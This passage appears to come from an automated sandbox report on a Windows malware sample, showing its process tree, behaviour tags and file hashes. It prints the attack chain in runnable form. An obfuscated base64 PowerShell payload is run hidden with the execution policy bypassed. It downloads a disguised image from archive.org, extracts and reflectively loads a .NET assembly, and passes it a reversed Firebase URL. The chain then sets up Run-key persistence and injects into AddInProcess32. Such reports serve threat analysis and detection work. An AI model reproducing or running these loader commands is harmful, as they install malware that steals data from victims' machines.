䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BD⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿bwBh⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBk⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿cwBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBi⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿eQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿UgBl⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bg⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿cwBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBi⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿eQBd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBM⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿B0⟑ ㏏ ䷆ ⋀ ▿Hk⟑ ㏏ ䷆ ⋀ ▿c⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿QQBz⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿RwBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bu⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿aQBi⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿SQBP⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿S⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿bwBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿Ec⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿E0⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿bwBk⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿JwBW⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿SQ⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿LgBJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿dgBv⟑ ㏏ ䷆ ⋀ ▿Gs⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿bgB1⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿WwBv⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿agBl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿F0⟑ ㏏ ䷆ ⋀ ▿XQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿JwBm⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿Ng⟑ ㏏ ䷆ ⋀ ▿1⟑ ㏏ ䷆ ⋀ ▿DM⟑ ㏏ ䷆ ⋀ ▿NQBk⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿O⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿DE⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿YQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿Dg⟑ ㏏ ䷆ ⋀ ▿LQBj⟑ ㏏ ䷆ ⋀ ▿DU⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿C0⟑ ㏏ ䷆ ⋀ ▿Nw⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿5⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿5⟑ ㏏ ䷆ ⋀ ▿DE⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZQBr⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿m⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿aQBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQ⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿D8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿B4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿Lg⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿4⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿bwBs⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿bw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿bwBj⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿cwBw⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿YQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿DI⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿eQBy⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿LwBi⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿B2⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿bQBv⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿LgBz⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿c⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bn⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bwBn⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿ZQBn⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿YQBi⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cgBp⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿Lw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿cwBw⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bo⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿JwBD⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿X⟑ ㏏ ䷆ ⋀ ▿BQ⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿bwBn⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿YQBt⟑ ㏏ ䷆ ⋀ ▿EQ⟑ ㏏ ䷆ ⋀ ▿YQB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿X⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿L⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿aQBu⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿dQBy⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bwBz⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿QQBk⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿F⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿ZQBz⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿Mw⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿L⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBz⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿HY⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⟑ ㏏ ䷆ ⋀ ▿','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('fd6535dd8c15-ca68-c544-74ae-a09f591e=nekot&aidem=tla?txt.1042028050mrowxenol/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\incurioso.js"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 19885⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 864 -ip 8641⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
408KB
-
Filesize
40KB
-
Filesize
624KB
-
Filesize
1.1MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB